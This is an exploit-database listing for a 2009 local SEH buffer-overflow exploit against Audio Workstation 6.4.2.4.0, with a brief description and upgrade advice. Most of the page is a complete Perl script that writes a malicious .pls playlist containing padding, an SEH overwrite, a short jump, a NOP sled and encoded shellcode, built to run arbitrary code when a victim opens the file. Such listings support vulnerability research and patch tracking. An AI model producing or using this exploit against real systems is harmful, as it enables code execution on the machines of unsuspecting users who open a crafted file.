header-logo
Suggest Exploit
vendor:
Audio Workstation
by:
germaya_x
7.6
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Audio Workstation
Affected Version From: 6.4.2.4.0
Affected Version To: 6.4.2.4.0
Patch Exists: YES
Related CWE: N/A
CPE: a:audio_workstation:audio_workstation
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2009

Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)

Audio Workstation is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of Audio Workstation.
Source

Exploit-DB raw data:

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             
==============================================================================
      Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)
==============================================================================
	[�] Exploited by:.......[       germaya_x       ].....................
        [�] Script:.............[   Audio Workstation   ].....................
        [�] version:............[       6.4.2.4.0       ]
	[�] Today:..............[       24/09/2009      ].....................
        [�] platform............[        Windows        ].....................
        [�] tested on:..........[     Windows XP SP2    ].....................
        [�] greetz:.............[  his0k4/D3v!LFUCK3R   ].....................
==============================================================================


	
=cut
##############################################################################
my $shellcode=
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a".
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46".
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45".
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c".
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c".
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44".
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c".
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46".
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50".
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44".
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45".
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43".
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b".
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43".
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41";
###################################################################
my $bof="\x41" x 1320;
my $nsh="\xEB\x09\x90\x90";# Short jmp
my $seh="\x5D\x38\x82\x7C";# KERNEL32.DLL
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> germaya_x.pls');
print myfile $bof.$nsh.$seh.$nop.$shellcode;
###################################################################

Navigation

Suggest Exploit

Services By CQR